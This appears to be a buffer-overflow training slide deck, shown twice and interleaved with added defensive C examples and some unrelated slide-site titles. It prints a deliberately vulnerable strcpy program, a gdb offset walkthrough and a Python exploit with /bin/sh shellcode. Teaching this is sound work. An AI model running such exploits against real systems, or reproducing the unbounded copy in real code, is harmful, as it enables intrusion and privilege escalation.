Thank you Aleph One! 
Refresher on buffer overflow in the old days 
Alex Moneger 
Security Engineer
Buffer overflow refresher 
- First paper by Aleph One in 1996 in Phrack #49:
http://www.phrack.org/issues.html?issue=49&id=14
- No OS level protections at the time
- Works by writing past the buffer end, i.e. stuffing more data into a buffer than it can hold
- Goal is to overwrite an interesting control structure with our attacker data. Can be the saved EIP, but can be any function pointer
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 2
Stack refresher (again ;)) 
- Stack holds local variables, the address of the previous frame, and the address of where to return to
- Goal is to overwrite the Saved EIP (referred to as SEIP)
- If we control SEIP, we control where the "ret" instruction will go, meaning we control EIP
[Diagram: stack frame, top to bottom: SEIP, SEBP, local function storage]
The “classic” 
cisco@kali:~/src/seccon/ch3$ pygmentize -g ch3.c 
#include <string.h>

int vuln(char *stuff) {
    char buf[0x64] = {0};   /* 100-byte local buffer */
    strcpy(buf, stuff);     /* no bound check: a longer stuff overruns the frame */
    return 1;
}

int main(int argc, char **argv) {
    vuln(argv[1]);
    return 0;
}

- "buf" has no boundary checking. "stuff" is attacker controlled
[Diagram: stack frame, top to bottom: SEIP, SEBP, buf]
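As an added example (not from the deck), the same function beside a bounded version that rejects any input that does not fit the 100-byte buffer together with its terminator; accepts_len() is a helper assumed here to exercise the check:

```c
#include <stdio.h>
#include <string.h>

#define BUF_LEN 0x64   /* the same 100-byte local buffer as ch3.c */

/* The deck's vulnerable function, unchanged: strcpy() stops only at the NUL
   in stuff, so anything longer than buf runs over the saved registers and SEIP. */
int vuln(char *stuff)
{
    char buf[BUF_LEN] = {0};
    strcpy(buf, stuff);
    return 1;
}

/* Hardened form: look for the terminator within the buffer size first, reject
   input that does not fit together with its NUL, then copy exactly what was
   measured. Returns 1 when copied, 0 when rejected. */
int vuln_safe(const char *stuff)
{
    char buf[BUF_LEN];
    if (stuff == NULL) return 0;
    const char *end = memchr(stuff, '\0', BUF_LEN);  /* never scans past BUF_LEN bytes */
    if (end == NULL) return 0;                        /* no NUL in the first 100 bytes: too long */
    memcpy(buf, stuff, (size_t)(end - stuff) + 1);    /* bounded copy, terminator included */
    return 1;
}

/* Helper (assumed here, not in the deck): does vuln_safe() accept len 'A's? */
int accepts_len(size_t len)
{
    char s[256];
    if (len >= sizeof s) return 0;
    memset(s, 'A', len);
    s[len] = '\0';
    return vuln_safe(s);
}

int main(int argc, char **argv)
{
    if (argc < 2) { fprintf(stderr, "usage: %s <string>\n", argv[0]); return 2; }
    printf("vuln_safe: %s\n", vuln_safe(argv[1]) ? "copied" : "rejected (too long)");
    return 0;
}
```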
Making it exploitable 
- Previous program compiled with the following options:
cisco@kali:~/src/seccon/ch3$ sudo sysctl -a | grep randomize
kernel.randomize_va_space = 0
cisco@kali:~/src/seccon/ch3$ cc ch3.c -fno-stack-protector -z execstack -U_FORTIFY_SOURCE -g -o ch3
- See how many security features we are disabling?
- Pretend we don't have the sources: find the size of the local stack storage from the function prologue
cisco@kali:~/src/seccon/ch3$ objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 10 | grep --color esp
804841d: 89 e5 mov ebp,esp
8048421: 83 c4 80 add esp,0xffffff80
cisco@kali:~/src/seccon/ch3$ python -c 'import exutil as e; print e.cmp2(0xffffff80)'
-128
Recon 
- Local storage for the function is 128 bytes. Nothing says that our vulnerable buf starts at the beginning of it
- Let's figure out how much we need to overwrite to control EIP
- Max overwrite size = ebp - esp + SEBP + SEIP = 128 + 4 + 4 = 136
[Diagram: stack frame, top to bottom: SEIP, SEBP, ????, buf, ????; the 128-byte local storage is the region below SEBP]
Finding the offsets manually 
cisco@kali:~/src/seccon/ch3$ python -c 'print "A =>", hex(ord("A")), "B =>", hex(ord("B"))' 
A => 0x41 B => 0x42 
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*132+"B"*4')) || dmesg | tail -n 1 
Segmentation fault 
[613635.624345] ch3[18312]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*128+"B"*4')) || dmesg | tail -n 1 
Segmentation fault 
[613642.976497] ch3[18318]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*124+"B"*4')) || dmesg | tail -n 1 
Segmentation fault 
[613663.605595] ch3[18325]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 
cisco@kali:~/src/seccon/ch3$ # Continue decrementing by 4 
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*112+"B"*4')) || dmesg | tail -n 1 
Segmentation fault 
[613678.429167] ch3[18331]: segfault at 42424242 ip 42424242 sp bffffd00 error 14 
- Doing this properly => use msf pattern_create.rb & pattern_offset.rb
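The dmesg lines above already carry a crash signature worth alerting on: error 14 is PF_USER|PF_INSTR, an instruction fetch from user mode, and an ip equal to the faulting address means the CPU tried to execute at a jump target rather than a data address. Added example (not from the deck) that parses such kernel segfault lines and triages them; the sample lines are constructed from the session above plus one benign NULL read:

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* x86 page-fault error code bits, printed in hex in the kernel's
   "segfault at ... error N" message. */
#define PF_PROT  0x01u  /* protection violation (0 = page not present) */
#define PF_WRITE 0x02u  /* write access (0 = read) */
#define PF_USER  0x04u  /* fault from user mode */
#define PF_INSTR 0x10u  /* instruction fetch */

struct segfault {
    char comm[64];
    int pid;
    unsigned long addr, ip, sp, err;
};

/* Parse "[ts] comm[pid]: segfault at A ip I sp S error E" (hex fields).
   The leading "[timestamp] " is optional. Returns 1 on success, 0 otherwise. */
int parse_segfault(const char *line, struct segfault *out)
{
    if (line[0] == '[') {                 /* skip the dmesg timestamp */
        line = strchr(line, ']');
        if (!line) return 0;
        line++;
        while (*line == ' ') line++;
    }
    int n = sscanf(line, "%63[^[][%d]: segfault at %lx ip %lx sp %lx error %lx",
                   out->comm, &out->pid, &out->addr, &out->ip, &out->sp, &out->err);
    return n == 6;
}

/* True when every byte of a 32-bit value is printable ASCII, i.e. the
   register looks like it was filled from text such as "AAAA" or a pattern. */
int all_printable32(unsigned long v)
{
    for (int i = 0; i < 4; i++)
        if (!isprint((int)((v >> (8 * i)) & 0xff))) return 0;
    return 1;
}

/* Triage one kernel segfault line.
   -1: not a segfault line
    0: ordinary crash (read/write fault, or ip inside mapped code)
    1: user-mode instruction fetch at an unmapped address equal to ip: the
       program jumped somewhere it should not have (control-flow hijack)
    2: as 1, and ip is made of printable bytes: the return address was most
       likely overwritten with user-supplied data, like 0x41414141 above */
int classify_segfault_line(const char *line)
{
    struct segfault s;
    if (!parse_segfault(line, &s)) return -1;
    if (!(s.err & PF_INSTR) || !(s.err & PF_USER) || s.ip != s.addr) return 0;
    return all_printable32(s.ip) ? 2 : 1;
}

int main(void)
{
    /* Constructed sample lines: two from the session above, one benign NULL read. */
    const char *lines[] = {
        "[613635.624345] ch3[18312]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14",
        "[613678.429167] ch3[18331]: segfault at 42424242 ip 42424242 sp bffffd00 error 14",
        "[42.000000] app[1234]: segfault at 0 ip 08048456 sp bffffd00 error 4",
    };
    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++)
        printf("%d  %s\n", classify_segfault_line(lines[i]), lines[i]);
    return 0;
}
```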
We’re going to overflow!!! 
1. Choose a shellcode
2. Compute its length, e.g. 40 bytes
3. Add the proper padding to overwrite SEIP: 112 - 40 = 72
4. Find the address of our shellcode
5. Append it to the buffer to redirect flow
[Diagram: buffer layout: shellcode | junk | SC address]
Finding buffer address 
cisco@kali:~/src/seccon/ch3$ env -i gdb --quiet --args ./ch3 $(python -c 'print "A"*112+"BCDE"') 
Reading symbols from /home/cisco/src/seccon/ch3/ch3...done. 
gdb$ gdb$ !objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 22 | tail -n 5 
804844e: 83 ec 80 sub esp,0xffffff80 
8048451: 5b pop ebx 
8048452: 5f pop edi 
8048453: 5d pop ebp 
8048454: c3 ret 
gdb$ gdb$ break *0x804844e 
Breakpoint 1 at 0x804844e: file ch3.c, line 9. 
gdb$ r 
gdb$ x/16w $esp 
0xbffffc70: 0xbffffc8c 0xbffffec9 0xb7ffeff4 0xbffffd70 
0xbffffc80: 0xb7fffac0 0xbffffd44 0xb7feb662 0x41414141 
0xbffffc90: 0x41414141 0x41414141 0x41414141 0x41414141 
0xbffffca0: 0x41414141 0x41414141 0x41414141 0x41414141 
gdb$ x/x 0xbffffc8c 
0xbffffc8c: 0x41414141 
gdb$ x/s 0xbffffc8c 
0xbffffc8c: 'A' <repeats 112 times>, "BBBB" 
gdb$ x/2w $ebp 
0xbffffcf8: 0x41414141 0x42424242 
gdb$ si 5 
--------------------------------------------------------------------------[regs] 
EAX: 00000001 EBX: 41414141 ECX: 00000000 EDX: 00000075 o d I t S z a P C 
ESI: 00000000 EDI: 41414141 EBP: 41414141 ESP: BFFFFD00 EIP: 42424242 
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop: 
Cannot access memory at address 0x42424242 
0x42424242 in ?? () 
Summary 
- We have the overflow length: 116 bytes (112 bytes + 4 bytes SEIP overwrite)
- We have the buffer's address (0xbffffc8c)
- We have a shellcode (I'm a nice guy)
- Stuff all of it together
Shell time 
cisco@kali:~/src/seccon/ch3$ pygmentize ch3.py 
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 script: str is a byte string here, so the payload is passed to execve as-is
import os
import struct

target = "ch3"
overflow_len = 112        # bytes from the start of buf to SEIP (measured above)
ret_addr = 0xbffffc8c     # address of buf, where the shellcode lands
target_path = os.path.abspath(target)

# setreuid(geteuid(),geteuid()); execve("/bin/sh",0,0)
sc = ("\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46"
      "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68"
      "\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80")

nop_sled = overflow_len - len(sc)      # filler after the shellcode, up to the SEIP slot
sc_addr = struct.pack("<I", ret_addr)  # little-endian SEIP overwrite
ex = "%s%s%s" % (sc, 'A' * nop_sled, sc_addr)
# run the target with the payload as argv[1]
os.execve(target_path, (target_path, ex), os.environ)
Result 
cisco@kali:~/src/seccon/ch3$ invoke ch3.py 
$ id 
uid=1000(cisco) gid=1001(cisco) groups=1001(cisco) 
$ exit 
cisco@kali:~/src/seccon/ch3$ 
Variations 
- Small buffers (shellcode doesn't fit): append the shellcode after the return address
[Diagram: buffer layout: junk | SC address | shellcode]
- Unpredictable buffer address (stack size is not under control): prepend a NOP sled to the shellcode
[Diagram: buffer layout: NOP sled | shellcode | SC address]
- Use an environment variable to host your shellcode
Limitations 
- Shellcode is executed on the stack, so the stack needs to be executable
- The buffer address must be known, so addresses can't be randomized
- Stack frame is not protected (more on this later)
- There are no null bytes in our buffer address (this can be fixed easily)
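Added check (not from the deck) for the first limitation: the PT_GNU_STACK program header is where "-z execstack" records an executable stack, so a defender can audit a binary for it without running anything. It handles ELF32 and ELF64 little-endian images; build_sample_elf32() is a constructed in-memory image for testing, not a real binary.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PT_GNU_STACK 0x6474e551u   /* program header describing stack permissions */
#define PF_X         0x1u          /* executable */

static uint16_t rd16(const unsigned char *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const unsigned char *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static uint64_t rd64(const unsigned char *p) { return rd32(p) | (uint64_t)rd32(p + 4) << 32; }
static void wr16(unsigned char *p, uint16_t v) { p[0] = v & 0xff; p[1] = v >> 8; }
static void wr32(unsigned char *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (v >> (8 * i)) & 0xff; }

/* Inspect a little-endian ELF image (ELF32 or ELF64) held in memory.
   Returns  1: PT_GNU_STACK has PF_X, the stack is executable (what "-z execstack" produces)
            0: PT_GNU_STACK present without PF_X, the stack is non-executable
           -1: no PT_GNU_STACK at all (historically the x86 loader then makes the stack executable)
           -2: not a little-endian ELF, or truncated */
int elf_stack_executable(const unsigned char *buf, size_t len)
{
    if (len < 52 || memcmp(buf, "\x7f" "ELF", 4) != 0 || buf[5] != 1) return -2;
    int is64 = buf[4] == 2;
    uint64_t phoff; uint16_t phentsize, phnum;
    if (is64) {
        if (len < 64) return -2;
        phoff = rd64(buf + 32); phentsize = rd16(buf + 54); phnum = rd16(buf + 56);
    } else {
        phoff = rd32(buf + 28); phentsize = rd16(buf + 42); phnum = rd16(buf + 44);
    }
    size_t phsize = is64 ? 56 : 32, flags_off = is64 ? 4 : 24;  /* p_flags sits elsewhere per class */
    for (uint16_t i = 0; i < phnum; i++) {
        uint64_t off = phoff + (uint64_t)i * phentsize;
        if (off + phsize > len) return -2;
        const unsigned char *ph = buf + off;
        if (rd32(ph) == PT_GNU_STACK) return (rd32(ph + flags_off) & PF_X) ? 1 : 0;
    }
    return -1;
}

/* Constructed sample (not a real binary): a bare ELF32 header followed by one
   PT_GNU_STACK program header carrying the given p_flags. Returns the image size. */
size_t build_sample_elf32(unsigned char *out, uint32_t stack_flags)
{
    memset(out, 0, 84);
    memcpy(out, "\x7f" "ELF", 4);
    out[4] = 1; out[5] = 1; out[6] = 1;       /* ELFCLASS32, ELFDATA2LSB, EV_CURRENT */
    wr32(out + 28, 52);                       /* e_phoff: program headers right after the header */
    wr16(out + 42, 32); wr16(out + 44, 1);    /* e_phentsize, e_phnum */
    wr32(out + 52, PT_GNU_STACK);             /* p_type */
    wr32(out + 52 + 24, stack_flags);         /* p_flags */
    return 84;
}

/* Build the sample with the given flags and classify it; with drop_phdr set,
   e_phnum is zeroed so the PT_GNU_STACK entry is never seen. */
int check_sample(uint32_t stack_flags, int drop_phdr)
{
    unsigned char img[84];
    size_t n = build_sample_elf32(img, stack_flags);
    if (drop_phdr) wr16(img + 44, 0);
    return elf_stack_executable(img, n);
}

/* Read a file into memory and classify it; returns the verdict codes above. */
int check_file(const char *path)
{
    FILE *f = fopen(path, "rb");
    if (!f) return -2;
    unsigned char *buf = NULL; size_t len = 0, cap = 0;
    for (;;) {
        if (len == cap) {
            cap = cap ? cap * 2 : 4096;
            unsigned char *nb = realloc(buf, cap);
            if (!nb) { free(buf); fclose(f); return -2; }
            buf = nb;
        }
        size_t got = fread(buf + len, 1, cap - len, f);
        if (got == 0) break;
        len += got;
    }
    fclose(f);
    int r = elf_stack_executable(buf, len);
    free(buf);
    return r;
}

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s <elf-binary>\n", argv[0]); return 2; }
    static const char *verdict[] = { "not a little-endian ELF / truncated",
                                     "no PT_GNU_STACK (executable by default)",
                                     "stack NOT executable", "stack EXECUTABLE" };
    int r = check_file(argv[1]);
    printf("%s: %s\n", argv[1], verdict[r + 2]);
    return r == 1 || r == -1;   /* non-zero exit when the stack would be executable */
}
```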
Now get to work 
- Compile and exploit ch3
- Try any of the different exploitation techniques described previously
- Don't use the "invoke" script when trying to exploit. What is happening to the stack? Why is your exploit failing?
- Enable one memory protection (whichever). Check the effect on the exploit
Introduction to Machine Learning Unit-3 for II MECH
 
Oracle_PLSQL_basic_tutorial_with_workon_Exercises.ppt
Oracle_PLSQL_basic_tutorial_with_workon_Exercises.pptOracle_PLSQL_basic_tutorial_with_workon_Exercises.ppt
Oracle_PLSQL_basic_tutorial_with_workon_Exercises.ppt
 
specification estimation and valuation of a building
specification estimation and valuation of a buildingspecification estimation and valuation of a building
specification estimation and valuation of a building
 
Présentation IIRB 2024 Chloe Dufrane.pdf
Présentation IIRB 2024 Chloe Dufrane.pdfPrésentation IIRB 2024 Chloe Dufrane.pdf
Présentation IIRB 2024 Chloe Dufrane.pdf
 
Lecture 2 .pdf
Lecture 2                           .pdfLecture 2                           .pdf
Lecture 2 .pdf
 

03 - Refresher on buffer overflow in the old days

  • 1. Thank you Aleph One!
    Refresher on buffer overflow in the old days
    Alex Moneger, Security Engineer
  • 2. Buffer overflow refresher
    - First paper by Aleph One in 1996 in Phrack #49: http://www.phrack.org/issues.html?issue=49&id=14
    - No OS level protections at the time
    - Works by writing past the buffer end, aka stuffing more data into a buffer than it can hold
    - Goal is to overwrite some interesting control structure with our attacker data. Can be saved EIP, but can be any function pointer
    © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  • 3. Stack refresher (again ;))
    - Stack holds local variables, the address of the previous frame, the address of where to return to
    - Goal is to overwrite Saved EIP (referred to as SEIP)
    - If we control SEIP, we control where the “ret” instruction will go, meaning we control EIP
    [diagram: stack frame, top to bottom: SEIP | SEBP | Local function storage]
  • 4. The “classic”
    cisco@kali:~/src/seccon/ch3$ pygmentize -g ch3.c
    #include <string.h>
    int vuln(char *stuff) {
        char buf[0x64] = {0};
        strcpy(buf, stuff);
        return 1;
    }
    int main(int argc, char **argv) {
        vuln(argv[1]);
        return 0;
    }
    - “buf” has no boundary checking. “stuff” is attacker controlled
    [diagram: stack frame, top to bottom: SEIP | SEBP | buf]
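An added example, not part of the slides or the course's ch3.c: the ch3 copy pattern next to a bounded version that reports over-long input instead of writing past buf. BUF_SIZE mirrors the 0x64-byte buffer; vuln_fixed and check_input_of_len are this example's own names, and the 'A'-filled inputs are constructed test data.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 0x64   /* the same 100-byte local buffer as ch3.c */

/* The ch3 pattern, kept for contrast and never called here: strcpy() copies until the
 * NUL in "stuff", so any input of 100 bytes or more runs past buf into SEBP and SEIP. */
int vuln(char *stuff) {
    char buf[BUF_SIZE] = {0};
    strcpy(buf, stuff);
    return 1;
}

/* Hardened form: the copy is bounded by the destination size and the caller is told
 * when the input did not fit, instead of silently truncating or overflowing.
 * Returns the number of bytes copied on success, -1 when "stuff" plus its NUL
 * does not fit in BUF_SIZE. */
int vuln_fixed(const char *stuff) {
    char buf[BUF_SIZE];
    /* memchr stops at the first NUL and never examines more than BUF_SIZE input bytes */
    const char *nul = memchr(stuff, '\0', BUF_SIZE);
    if (nul == NULL)
        return -1;                      /* no terminator within 100 bytes: would overflow */
    memcpy(buf, stuff, (size_t)(nul - stuff) + 1);
    return (int)strlen(buf);            /* buf is now a properly terminated copy */
}

/* Constructed test input: n bytes of 'A' (as on the slides) followed by a NUL, n <= 255.
 * Returns what vuln_fixed() reports for that input. */
int check_input_of_len(size_t n) {
    static char sample[256];
    if (n > sizeof sample - 1)
        n = sizeof sample - 1;
    memset(sample, 'A', n);
    sample[n] = '\0';
    return vuln_fixed(sample);
}

int main(int argc, char **argv) {
    if (argc > 1)
        printf("argv[1]: %d\n", vuln_fixed(argv[1]));
    printf("99 x 'A':  %d\n", check_input_of_len(99));    /* 99: fits, NUL included */
    printf("116 x 'A': %d\n", check_input_of_len(116));   /* -1: the slides' overflow length */
    return 0;
}
```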
  • 5. Making it exploitable
    - Previous program compiled with the following options:
    cisco@kali:~/src/seccon/ch3$ sudo sysctl -a | grep randomize
    kernel.randomize_va_space = 0
    cisco@kali:~/src/seccon/ch3$ cc ch3.c -fno-stack-protector -z execstack -U_FORTIFY_SOURCE -g -o ch3
    - See how many security features we are disabling?
    - Pretend we don’t have sources: find the size of the local stack storage in the function prologue
    cisco@kali:~/src/seccon/ch3$ objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 10 | grep --color esp
     804841d:	89 e5                	mov    ebp,esp
     8048421:	83 c4 80             	add    esp,0xffffff80
    cisco@kali:~/src/seccon/ch3$ python -c 'import exutil as e; print e.cmp2(0xffffff80)'
    -128
  • 6. Recon
    - Local storage for the function is 128 bytes. Nothing says that our vulnerable buf starts at the beginning of that
    - Let’s figure out how much we need to overwrite to control EIP
    - Max overwrite size = ebp – esp + SEBP + SEIP = 128 + 4 + 4 = 136
    [diagram: stack frame, top to bottom: SEIP | SEBP | ???? | buf | ???? ; the local storage region is 128 bytes]
  • 7. Finding the offsets manually
    cisco@kali:~/src/seccon/ch3$ python -c 'print "A =>", hex(ord("A")), "B =>", hex(ord("B"))'
    A => 0x41 B => 0x42
    cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*132+"B"*4')) || dmesg | tail -n 1
    Segmentation fault
    [613635.624345] ch3[18312]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14
    cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*128+"B"*4')) || dmesg | tail -n 1
    Segmentation fault
    [613642.976497] ch3[18318]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14
    cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*124+"B"*4')) || dmesg | tail -n 1
    Segmentation fault
    [613663.605595] ch3[18325]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14
    cisco@kali:~/src/seccon/ch3$ # Continue decrementing by 4
    cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*112+"B"*4')) || dmesg | tail -n 1
    Segmentation fault
    [613678.429167] ch3[18331]: segfault at 42424242 ip 42424242 sp bffffd00 error 14
    - Doing this properly => use msf pattern_create.rb & pattern_offset.rb
  • 8. We’re going to overflow!!!
    1. Choose a shellcode
    2. Compute its length, e.g. 40 bytes
    3. Add the proper padding to overwrite SEIP: 112 - 40 = 72
    4. Find the address of our shellcode
    5. Append it to the buffer to redirect flow
    [diagram: buffer layout: Shellcode | Junk | SC Address]
  • 9. Finding buffer address
    cisco@kali:~/src/seccon/ch3$ env -i gdb --quiet --args ./ch3 $(python -c 'print "A"*112+"BCDE"')
    Reading symbols from /home/cisco/src/seccon/ch3/ch3...done.
    gdb$
    gdb$ !objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 22 | tail -n 5
     804844e:	83 ec 80             	sub    esp,0xffffff80
     8048451:	5b                   	pop    ebx
     8048452:	5f                   	pop    edi
     8048453:	5d                   	pop    ebp
     8048454:	c3                   	ret
    gdb$
    gdb$ break *0x804844e
    Breakpoint 1 at 0x804844e: file ch3.c, line 9.
    gdb$ r
    gdb$ x/16w $esp
    0xbffffc70:	0xbffffc8c	0xbffffec9	0xb7ffeff4	0xbffffd70
    0xbffffc80:	0xb7fffac0	0xbffffd44	0xb7feb662	0x41414141
    0xbffffc90:	0x41414141	0x41414141	0x41414141	0x41414141
    0xbffffca0:	0x41414141	0x41414141	0x41414141	0x41414141
    gdb$ x/x 0xbffffc8c
    0xbffffc8c:	0x41414141
    gdb$ x/s 0xbffffc8c
    0xbffffc8c:	'A' <repeats 112 times>, "BBBB"
    gdb$ x/2w $ebp
    0xbffffcf8:	0x41414141	0x42424242
    gdb$ si 5
    --------------------------------------------------------------------------[regs]
    EAX: 00000001 EBX: 41414141 ECX: 00000000 EDX: 00000075 o d I t S z a P C
    ESI: 00000000 EDI: 41414141 EBP: 41414141 ESP: BFFFFD00 EIP: 42424242
    CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
    Error while running hook_stop: Cannot access memory at address 0x42424242
    0x42424242 in ?? ()
  • 10. Summary
    - We have the overflow length: 116 bytes (112 bytes + 4 bytes SEIP overwrite)
    - We have the buffer’s address (0xbffffc8c)
    - We have a shellcode (I’m a nice guy)
    - Stuff all of it together
  • 11. Shell time
    cisco@kali:~/src/seccon/ch3$ pygmentize ch3.py
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import os
    import struct

    target = "ch3"
    overflow_len = 112
    ret_addr = 0xbffffc8c
    target_path = os.path.abspath(target)

    # setreuid(geteuid(),geteuid()); execve("/bin/sh",0,0)
    sc = ("\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46"
          "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68"
          "\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80")
    nop_sled = overflow_len - len(sc)
    sc_addr = struct.pack("<I", ret_addr)
    ex = "%s%s%s" % (sc, 'A'*nop_sled, sc_addr)
    os.execve(target_path, (target_path, ex), os.environ)
  • 12. Result
    cisco@kali:~/src/seccon/ch3$ invoke ch3.py
    $ id
    uid=1000(cisco) gid=1001(cisco) groups=1001(cisco)
    $ exit
    cisco@kali:~/src/seccon/ch3$
  • 13. Variations
    - Small buffers (shellcode doesn’t fit): append the shellcode after the return address
      [diagram: buffer layout: SC Address | Junk | Shellcode]
    - Unpredictable buffer address (stack size is not under control): prepend a NOP sled to the shellcode
      [diagram: buffer layout: NOP sled | Shellcode | SC Address]
    - Use an environment variable to host your shellcode
  • 14. Limitations
    - Shellcode is executed on the stack, so the stack needs to be executable
    - Buffer address is known, so addresses can’t be randomized
    - Stack frame is not protected (more on this later)
    - There are no null bytes in our buffer address (this can be fixed easily)
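The first limitation above is exactly what "-z execstack" on slide 5 switched off. An added example, not from the slides: a small C check that reads the PT_GNU_STACK program header of a 32-bit ELF image to tell whether the binary asks for an executable stack, run here on a constructed header rather than a real file. The struct names and check_sample are this example's own; the layouts follow Elf32_Ehdr / Elf32_Phdr from <elf.h>.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PT_GNU_STACK 0x6474e551u   /* program header the loader consults for stack permissions */
#define PF_X 0x1u

/* ELF32 header layouts: same field order and sizes as Elf32_Ehdr / Elf32_Phdr in <elf.h>,
 * redefined so this compiles without the system header. 32-bit (i386, like ch3) only. */
struct ehdr32 {
    unsigned char e_ident[16];
    uint16_t e_type, e_machine;
    uint32_t e_version, e_entry, e_phoff, e_shoff, e_flags;
    uint16_t e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx;
};
struct phdr32 { uint32_t p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align; };

/* Returns 1 if PT_GNU_STACK requests an executable stack (what "cc -z execstack" emits),
 * 0 if the stack is marked non-executable, -1 if the image is not ELF32 or has no
 * PT_GNU_STACK entry at all (the loader then applies its own default). */
int stack_is_executable(const unsigned char *img, size_t len) {
    struct ehdr32 eh;
    if (len < sizeof eh) return -1;
    memcpy(&eh, img, sizeof eh);                   /* memcpy: no alignment assumptions on img */
    if (memcmp(eh.e_ident, "\x7f" "ELF", 4) != 0 || eh.e_ident[4] != 1) return -1; /* ELFCLASS32 */
    if (eh.e_phentsize != sizeof(struct phdr32)) return -1;
    for (uint32_t i = 0; i < eh.e_phnum; i++) {
        struct phdr32 ph;
        size_t off = (size_t)eh.e_phoff + (size_t)i * sizeof ph;
        if (off + sizeof ph > len) return -1;      /* truncated program header table */
        memcpy(&ph, img + off, sizeof ph);
        if (ph.p_type == PT_GNU_STACK) return (ph.p_flags & PF_X) ? 1 : 0;
    }
    return -1;
}

/* Constructed sample (not a loadable binary): an ELF32 header plus one PT_GNU_STACK
 * entry carrying the given p_flags. Returns what stack_is_executable() reports for it. */
int check_sample(uint32_t stack_flags) {
    unsigned char img[sizeof(struct ehdr32) + sizeof(struct phdr32)];
    struct ehdr32 eh = {0};
    struct phdr32 ph = {0};
    memcpy(eh.e_ident, "\x7f" "ELF", 4);
    eh.e_ident[4] = 1; eh.e_ident[5] = 1;           /* 32-bit, little-endian */
    eh.e_type = 2; eh.e_machine = 3;                /* ET_EXEC, EM_386 */
    eh.e_ehsize = sizeof eh; eh.e_phoff = sizeof eh;
    eh.e_phentsize = sizeof ph; eh.e_phnum = 1;
    ph.p_type = PT_GNU_STACK; ph.p_flags = stack_flags; ph.p_align = 16;
    memcpy(img, &eh, sizeof eh);
    memcpy(img + sizeof eh, &ph, sizeof ph);
    return stack_is_executable(img, sizeof img);    /* 0x6 (rw-) -> 0, 0x7 (rwx) -> 1 */
}
```

On a real binary, read the file into memory and pass it to stack_is_executable; readelf -lW shows the same GNU_STACK flags for comparison.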
  • 15. Now get to work
    - Compile and exploit ch3
    - Try any different exploitation technique described previously
    - Don’t use the “invoke” script when trying to exploit. What is happening to the stack? Why is your exploit failing?
    - Enable one memory protection (whichever). Check the effect on the exploit